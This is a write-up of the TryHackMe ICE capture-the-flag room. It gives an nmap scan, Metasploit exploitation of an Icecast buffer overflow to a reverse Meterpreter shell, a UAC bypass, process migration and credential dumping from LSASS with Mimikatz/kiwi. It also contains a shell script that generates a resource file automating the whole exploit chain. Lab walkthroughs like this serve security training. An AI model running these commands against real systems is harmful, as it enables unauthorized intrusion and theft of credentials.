TryHackMe: ICE Box Writeup

Abdullah Hamza
8 min read · Feb 12, 2024


Deploy & hack into a Windows machine, exploiting a very poorly secured media server. Click on the following link and join the room.

Check connection

Ping the machine's IP to check that the VPN connection to the target is up. In my case the ping is successful, so the connection is established. (If ping fails it does not necessarily mean the box is down: Windows hosts often drop ICMP, which is why the nmap command below uses -Pn.)

Checking Connection

Scanning

Let's start with an nmap scan. Use the following command to scan the target IP address.

sudo nmap -sS -Pn -A -p- -oN scan.txt -T4 10.10.49.124

This command performs a comprehensive scan of the specified IP address, attempting to gather detailed information about the services, ports, and operating system running on the target machine.

  • sudo Runs the command with superuser privileges. Nmap needs raw-socket access for the SYN scan and OS detection and refuses -sS without it.
  • nmap Invokes Nmap, the network exploration and security auditing tool.
  • -sS SYN ("half-open") scan. Nmap sends a SYN to each port and classifies it as open, closed or filtered from the reply without completing the TCP handshake. It is faster than a connect scan and leaves fewer traces in application logs, though any IDS will still see it.
  • -Pn Treats the host as online and skips host discovery. Useful when the target does not answer ping, which is common for Windows hosts.
  • -A Enables the aggressive options: OS detection, version detection, default NSE scripts and traceroute. This is noisy and slow, but it is what identifies Icecast and the Windows version for the questions below.
  • -p- Scans all 65,535 TCP ports instead of Nmap's default top 1,000, so services on ports outside the default list are not missed.
  • -oN scan.txt Saves the output in normal (human-readable) format to scan.txt. Keep this file; the Recon answers come straight from it.
  • -T4 Timing template 4 ("aggressive"), a reasonable speed/reliability trade-off over a VPN. Drop to -T3 if you see many filtered ports or missed services.
Nmap scan results
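The Recon questions are all answerable from scan.txt, so here is a small POSIX shell helper that reads the normal-format (-oN) file and pulls out the open ports, the service on a given port and the highest open port under a limit. This is an added example, not part of the original write-up; the scan.txt it writes is a constructed sample shaped like the ICE box's output (port list and banners are assumptions), so point the functions at your own scan.txt to get your real answers.

```shell
#!/bin/sh
# Added example: parse an nmap -oN file for the Recon answers.
# The sample below is CONSTRUCTED to look like the ICE box; replace
# SCAN_FILE with your own scan.txt for real results.

SCAN_FILE="${TMPDIR:-/tmp}/ice-scan-example.txt"

cat > "$SCAN_FILE" <<'EOF'
# Nmap 7.94 scan initiated Mon Feb 12 10:00:00 2024 as: nmap -sS -Pn -A -p- -oN scan.txt -T4 10.10.49.124
Nmap scan report for 10.10.49.124
Host is up (0.12s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp  open  tcpwrapped
5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http               Icecast streaming media server
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
# Nmap done at Mon Feb 12 10:12:00 2024 -- 1 IP address (1 host up) scanned in 720.00 seconds
EOF

# Print "port service version" for every open TCP port in an -oN file.
# Only lines that look like "NNN/tcp open ..." are considered, so the
# header, "Not shown" and "Service Info" lines are ignored.
open_ports() {
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
        split($1, p, "/"); v = ""
        for (i = 4; i <= NF; i++) v = v (i > 4 ? " " : "") $i
        printf "%s %s %s\n", p[1], ($3 == "" ? "-" : $3), v
    }' "$1"
}

# Number of open TCP ports (one of the Recon questions).
count_open() { open_ports "$1" | wc -l | tr -d ' '; }

# Service nmap identified on a given port; empty if the port is not open.
service_on_port() { open_ports "$2" | awk -v p="$1" '$1 == p {print $2; exit}'; }

# Highest open port strictly below a limit (e.g. "highest port under 10000").
highest_port_below() {
    open_ports "$2" | awk -v lim="$1" '$1+0 < lim+0 && $1+0 > best {best = $1+0} END {print best+0}'
}

echo "open ports: $(count_open "$SCAN_FILE")"
echo "service on 8000: $(service_on_port 8000 "$SCAN_FILE")"
echo "highest port below 10000: $(highest_port_below 10000 "$SCAN_FILE")"
open_ports "$SCAN_FILE"
```

The version column is kept verbatim, so `open_ports scan.txt | grep 8000` gives you the Icecast banner the Gain Access questions ask about.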

Based on these results, let's answer the questions in the Recon part on TryHackMe.

Recon questions and answers

Gain Access

The scan shows several services; the most interesting one is Icecast on port 8000, a streaming media server with a well-known remote code execution bug in old versions. Let's check whether a public exploit exists. To search the Exploit-DB mirror with SearchSploit, run

searchsploit icecast

This lists the available exploits with their paths and platforms. SearchSploit ships with Kali; on other systems install the exploitdb package first.

available exploits on searchsploit

Search exploit on database

To find CVE number of exploit on CVE Database click on the following link and search for ICECAST.

The entry that matches the Metasploit module we use next is CVE-2004-1561 (Icecast 2.0.1 HTTP header buffer overflow), which carries a CVSS score of 7.5.

CVE number of exploit on database

Clicking the CVE number shows the vulnerability category: it is a buffer overflow that lets a remote attacker execute arbitrary code by sending an HTTP request with too many headers.

Vulnerability Category

Metasploit

To start Metasploit, type the following command in the terminal

msfconsole

and once the console has loaded, search for the module with

search icecast
searching for exploit on msfconsole

We have found an exploit module for Icecast. Let's use it against the vulnerable Icecast instance. Copy the module name from the results and select it with

use exploit/windows/http/icecast_header

then list the module's options with

show options
using exploit for icecast

Point the module at the target by setting RHOSTS to the machine's IP address:

set RHOSTS 10.10.49.124

LHOST is the address the reverse shell connects back to, so it must be your TryHackMe VPN address (the tun0 interface), not your LAN IP; otherwise the payload runs but the session never arrives.

set LHOST 10.6.114.60
Setting RHOSTS and LHOST

Type run to launch the exploit and get a Meterpreter session, then use the ls command to confirm the session works.

using ls command to list files in meterpreter session

and we got that working….congratulations🎉🎉🎉

Based on the findings answer the questions on tryhackme.

Gain Access answers on tryhackme

Get system information

Let's use the getuid command to see which user the Icecast server runs as, and the sysinfo command to get the operating system and architecture details.

Getting system information

Shell access

To open a command shell on the compromised system, type shell in Meterpreter. Running whoami in that shell should return the same user that getuid reported, which confirms the shell is live.

shell of the compromised system

Leave the command shell (exit) so you are back at the meterpreter prompt, then use the background command to send the session to the background and return to msfconsole.

Session running in background

Back at the msfconsole prompt, use search suggester to find the local exploit suggester, a post module that checks which local privilege escalation exploits apply to the session.

Exploit found on metasploit to exploit vulnerability

Select it with the following command.

use post/multi/recon/local_exploit_suggester
using the exploit we found

In Metasploit, show options displays the available options for the selected module and their current settings.

For this module the only option is SESSION: it is marked Required = yes and has no default value, so we must tell it which Meterpreter session to examine.

Use the sessions command in msfconsole to list the available sessions. Our Meterpreter session is listed with Id 2.

Checking sessions available for this

Now use set SESSION 2 so the suggester runs against session 2 on the Windows machine.

Setting session 2 for exploit

With the session set, run executes the exploit suggester, which checks the session against its list of local exploits and prints the ones it believes will work.

exploit suggester executed

The suggester reports an exploit the target appears vulnerable to; in the ICE room this is the UAC bypass module exploit/windows/local/bypassuac_eventvwr. Select it with the use command and the module name, then check its options with show options.

using exploit to access windows system

The info command shows the module's description, references and targets.

Description of the exploit used

With the module selected, set LHOST to your VPN address for the new listener, point it at our session with set SESSION 2, and execute it with run.

Executing payload

After the payload runs, wait about 10 seconds for the new Meterpreter session to open. Run dir to check that we are in the right session; in Meterpreter dir is an alias of ls and lists the current directory on the Windows target.

Listing files in windows
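The Gain Access and Escalate steps above are typed into msfconsole one at a time; once you know the chain works, the practical way to replay it is a Metasploit resource script (msfconsole -q -r ice.rc). The shell helper below writes that script and refuses to do so if either address is not a valid IPv4, so a typo fails before the exploit fires. It is an added example, not the author's code or a Metasploit file; it assumes the first session gets Id 1, the elevated one Id 2, that the suggester's answer is bypassuac_eventvwr as in the room, and that the second handler listens on 4445 so it cannot collide with the first on 4444.

```shell
#!/bin/sh
# Added example: generate a Metasploit resource script for the ICE chain
#   icecast_header -> local_exploit_suggester -> bypassuac_eventvwr
# Assumptions: session Ids 1 (initial) and 2 (elevated); second handler on 4445.

# Return 0 only for a well-formed dotted-quad IPv4 with every octet <= 255.
is_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for o in $(printf '%s' "$1" | tr '.' ' '); do
        [ "$o" -le 255 ] || return 1
    done
}

# build_ice_rc <target ip> <attacker VPN (tun0) ip> <output file>
build_ice_rc() {
    rhost=$1; lhost=$2; out=$3
    is_ipv4 "$rhost" || { echo "bad RHOSTS: $rhost" >&2; return 1; }
    is_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    cat > "$out" <<EOF
# Gain Access: Icecast 2.0.1 HTTP header overflow (CVE-2004-1561)
use exploit/windows/http/icecast_header
set RHOSTS $rhost
set LHOST $lhost
exploit -z
sleep 10
# Escalate: run the suggester against session 1, then the UAC bypass it reports
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST $lhost
set LPORT 4445
exploit -z
sleep 10
sessions -l
EOF
}

RC="${TMPDIR:-/tmp}/ice.rc"
build_ice_rc 10.10.49.124 10.6.114.60 "$RC" && echo "written $RC; run: msfconsole -q -r $RC"
```

exploit -z opens the session without dropping you into it, and sleep 10 gives the reverse shell time to arrive before the next module asks for SESSION 1; if your Ids differ, edit the generated file rather than the chain.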

Now that we have an elevated Meterpreter session, send it to the background as well and check with the sessions command that both sessions are listed.

Sessions established in background

We can see our two sessions in the background. Interact with the new, elevated one using sessions -i 3 (the Id from the listing). To check which privileges this token holds, use the getprivs command in Meterpreter; it lists the enabled privileges.

checking privileges on the target machine

Among the privileges is SeTakeOwnershipPrivilege, which lets the token take ownership of any object (files, registry keys) regardless of its DACL, so we could seize and then rewrite protected files. Based on this information, let's answer the questions on TryHackMe.

Escalate answers on tryhackme

Looting

Moving on to the looting part: we need to migrate into a process that has the permissions required to interact with lsass, the Local Security Authority Subsystem Service that handles authentication in Windows and keeps credential material in memory. First, list the running processes with the command `ps`.

To interact with lsass we need to be 'living in' a process with the same architecture as lsass (x64 on this machine) and the same privileges, i.e. running as NT AUTHORITY\SYSTEM. The print spooler service, spoolsv.exe, meets both requirements.

lsass service found along with spoolsv
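Reading the two criteria off a long ps listing by eye is error-prone, so here is an added shell helper (not from the write-up) that applies them mechanically: look up lsass.exe's architecture, then pick a process with the same architecture running as NT AUTHORITY\SYSTEM, skipping lsass itself and the core processes (System, smss, csrss) that are unsafe to migrate into, preferring spoolsv.exe when present. The ps output below is a constructed sample modelled on the ICE box (PIDs and paths are assumptions; your listing will differ), so paste your own ps output in its place.

```shell
#!/bin/sh
# Added example: choose a Meterpreter migration target from `ps` output.
# SAMPLE_PS is CONSTRUCTED to resemble the ICE box; replace it with your listing.

SAMPLE_PS='
 PID   PPID  Name               Arch  Session  User                 Path
 ---   ----  ----               ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System             x64   0
 416   4     smss.exe           x64   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 500   492   csrss.exe          x64   0        NT AUTHORITY\SYSTEM  C:\Windows\system32\csrss.exe
 560   492   lsass.exe          x64   0        NT AUTHORITY\SYSTEM  C:\Windows\system32\lsass.exe
 1260  568   spoolsv.exe        x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe
 1856  2260  Icecast2.exe       x86   1        Dark-PC\Dark         C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
 2516  600   svchost.exe        x86   0        NT AUTHORITY\SYSTEM  C:\Windows\SysWOW64\svchost.exe
'

# Architecture (x64/x86) of the process named $1; reads ps output on stdin.
proc_arch() { awk -v n="$1" '$3 == n {print $4; exit}'; }

# pick_migration_target <arch> <preferred name>
# Prints the PID of a process with the given arch running as NT AUTHORITY\SYSTEM,
# excluding lsass.exe and the core processes. The preferred name wins if present;
# otherwise the first other candidate is used. Prints nothing if none qualifies.
pick_migration_target() {
    awk -v arch="$1" -v want="$2" '
        $1 ~ /^[0-9]+$/ && $4 == arch && $6 == "NT" && $7 == "AUTHORITY\\SYSTEM" {
            if ($3 == "lsass.exe" || $3 == "System" || $3 == "smss.exe" || $3 == "csrss.exe") next
            if ($3 == want) { print $1; found = 1; exit }
            if (!fallback) fallback = $1
        }
        END { if (!found && fallback) print fallback }'
}

LSASS_ARCH=$(printf '%s\n' "$SAMPLE_PS" | proc_arch lsass.exe)
TARGET=$(printf '%s\n' "$SAMPLE_PS" | pick_migration_target "$LSASS_ARCH" spoolsv.exe)
echo "lsass.exe is $LSASS_ARCH; in Meterpreter run: migrate $TARGET"
```

The arch check matters: on a box where lsass is x86 the same function returns the x86 SYSTEM svchost instead, which is exactly the case where migrating into an x64 spooler would leave kiwi unable to read LSASS.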

We can migrate into that process with migrate 1260 (1260 is the PID of spoolsv.exe in our ps listing; yours will differ, so read it from your own output). After migrating, sysinfo should show the Meterpreter architecture as x64/windows, and whoop, we got that!

migrated to spoolsv.exe process

Now let's use the getuid command to check which user we are running as.

Checking username

So, we are logged in as NT AUTHORITY\SYSTEM.

Now that we are running as SYSTEM, we'll set our sights on looting. Mimikatz is a rather infamous credential-dumping tool that is incredibly useful. Load it with the command `load kiwi` (Kiwi is the Meterpreter extension that embeds Mimikatz 2.x).

Loading Kiwi

Now, to retrieve all credentials, use the creds_all command, which dumps the NTLM hashes and any cleartext passwords (wdigest, kerberos) that LSASS holds in memory.

Retrieving credentials

Whooooop!! We got the credentials, including the cleartext password of the user Dark on Dark-PC. Based on these findings, let's answer the questions in the looting part on TryHackMe.

looting part answers on tryhackme

The post-exploitation part of the ICE box is an easy task. Just read the description provided on TryHackMe and you are good to go.
CONGRATULATIONS!!! The room is completed!

This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊

Written by Abdullah Hamza

Developer | CEH | Penetration Tester | Red Team
